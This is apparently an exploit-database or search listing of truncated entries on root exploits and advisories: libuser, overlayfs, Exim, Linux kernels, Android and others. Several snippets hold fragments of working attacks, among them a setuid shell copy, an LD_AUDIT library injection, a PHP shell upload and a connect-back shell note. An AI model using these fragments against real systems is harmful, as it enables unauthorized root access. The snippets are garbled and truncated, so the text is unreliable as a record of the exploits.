Dropbox 3.3.x - OSX FinderLoadBundle Local Root Exploit

The setuid root FinderLoadBundle that was included in older DropboxHelperTools versions for OS X allows loading of dynamically linked shared libraries that are residing in the same directory. The directory in which FinderLoadBundle is located is owned by root and that prevents placing arbitrary...

openSUSE: Security Advisory for libuser (openSUSE-SU-2015:1332-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

openSUSE Security Update : libuser (openSUSE-2015-529)

libuser was updated to fix on security issue. The following vulnerability was fixed : - CVE-2015-3246: local root exploit through passwd file handling boo937533 %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from openSUSE...

Security update for libuser (important)

libuser was updated to fix on security issue. The following vulnerability was fixed: CVE-2015-3246: local root exploit through passwd file handling boo937533...

Qualys Security Advisory - CVE-2015-3245 userhelper - CVE-2015-3246 libuser

Hello, it is July 23, 2015, 17:00 UTC, the Coordinated Release Date for CVE-2015-3245 and CVE-2015-3246. Please find our advisory below, and our exploit attached. Qualys Security Advisory CVE-2015-3245 userhelper chfn newline filtering CVE-2015-3246 libuser passwd file handling -- Summary...

Qualys Security Advisory - userhelper / libuser

Qualys Security Advisory CVE-2015-3245 userhelper chfn newline filtering CVE-2015-3246 libuser passwd file handling -- Summary ----------------------------------------------------------------- The libuser library implements a standardized interface for manipulating and administering user and grou...

Ubuntu 12.04 / 14.04 / 14.10 / 15.04 overlayfs Local Root Exploit

The overlayfs filesystem does not correctly check file permissions when creating new files in the upper filesystem directory. This can be exploited by an unprivileged process in kernels with CONFIGUSERNS=y and where overlayfs has the FSUSERNSMOUNT flag, which allows the mounting of overlayfs insi...

Seagate Central Remote Root Exploit

Seagate Central by default has a passwordless root account and no option to change it. This exploit logs into the ftp server and uploads a php shell to the webroot. From there, the uploaded shell can execute commands with root privileges as lighttpd. !/usr/bin/python seagateftpremoteroot.py Seaga...

Apple Mac OSX < 10.9/10 - Local Privilege Escalation

/ osx-irony-assist.m Copyright c 2010 by Apple MACOS X include import import / where you want to write it! / define BACKDOORBIN "/var/db/.AccessibilityAPIEnabled" int doassistivecopyconst char spath, const char dpath NSAutoreleasePool pool = NSAutoreleasePool alloc init; id authenticatorInstance,...

Barracuda Firmware 5.0.0.012 - (Authenticated) Remote Command Execution (Metasploit)

Exploit Title: Barracuda Firmware 'Barracuda Firmware %q This module exploits a remote command execution vulnerability in the Barracuda Firmware Version 'xort', metasploit module , 'Version' = '$Revision: 12345 $', 'References' = 'none', 'none', , 'Platform' = 'linux', 'Privi...

Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2

No description provided by source. /Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c Blog post about it is here: http://blog.zx2c4.com/749 / / Mempodipper by zx2c4 Linux Local Root Exploit Rather than put my write up here, per usual, this time I've put it in a rather...

GNU libc 2.12.1 LD_AUDIT libpcprofile.so Local Root

!/bin/sh Exploit Title: GNU libc /tmp/libxpl.c /dev/null cat /tmp/libxpl.so /lib/libxpl.so rm -rf /tmp/libxpl.c /tmp/libxpl.so LDAUDIT="libxpl.so" ping...

Exim 4.63 - Remote Root Exploit

No description provided by source. Exim 4.63 RedHat/Centos/Debian Remote Root Exploit by Kingcope Modified perl version of metasploit module =for comment use this connect back shell as trojanurl and be sure to setup a netcat, ---snip--- $system = '/bin/sh'; $ARGC=@ARGV; if $ARGC!=2 print Usage: $...

ISDN4Linux 3.1 IPPPD Device String SysLog Format String Vulnerability (2)

No description provided by source. source: http://www.securityfocus.com/bid/5437/info isdn4linux is a freely available, open source package of isdn compatibility tools. It is available for Linux operating systems. isdn4linux contains a format string vulnerability in the ipppd utility. In some...

Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit

No description provided by source. / Author: h00lyshit Vulnerable: Linux 2.6 ALL Type of Vulnerability: Local Race Tested On : various distros Vendor Status: unknown Disclaimer: In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or sprea...

Trixbox (endpoint_aastra.php, mac param) - Remote Code Injection

No description provided by source. App : Trixbox all versions vendor : trixbox.com Author : i-Hmx mail : [email protected] Home : security arrays inc , sec4ever.com ,exploit4arab.net Well well well , we decided to give schmoozecom a break and have a look @ fonality products do you think they have...

Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)

No description provided by source. / Linux = 2.6.13 prctl kernel exploit C Julien TINNES If you read the Changelog from 2.6.13 you've probably seen: PATCH setuid core dump This patch mainly adds suidsafe to suiddumpable sysctl but also a new per process, user setable argument to PRSETDUMPABLE. Th...

Mac OS X Adobe Version Cue - Local Root Exploit

No description provided by source. Proof of concept: haven: fintler$ cd haven: fintler$ id uid=502fintler gid=500fintler groups=500fintler haven: fintler$ echo cp /bin/sh /Users/$USER;chmod 4755 /Users/$USER/sh;chown root /Users/$USER/sh productname.sh haven: fintler$ chmod 0755 ./productname.sh...

Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Local Root Exploit

No description provided by source. !/bin/sh $Id: raptorlibnspr2,v 1.4 2006/10/16 11:50:48 raptor Exp $ raptorlibnspr2 - Solaris 10 libnspr LDPRELOAD exploit Copyright c 2006 Marco Ivaldi [email protected] Local exploitation of a design error vulnerability in version 4.6.1 of NSPR, as include...

Android 1.x/2.x - Local Root Exploit

No description provided by source. / android 1.x/2.x the real youdev feat. init local root exploit. C 2009/2010 by The Android Exploid Crew. Copy from sdcard to /sqlitestmtjournals/exploid, chmod 0755 and run. Or use /data/local/tmp if available thx to ioerror! It is important to to use...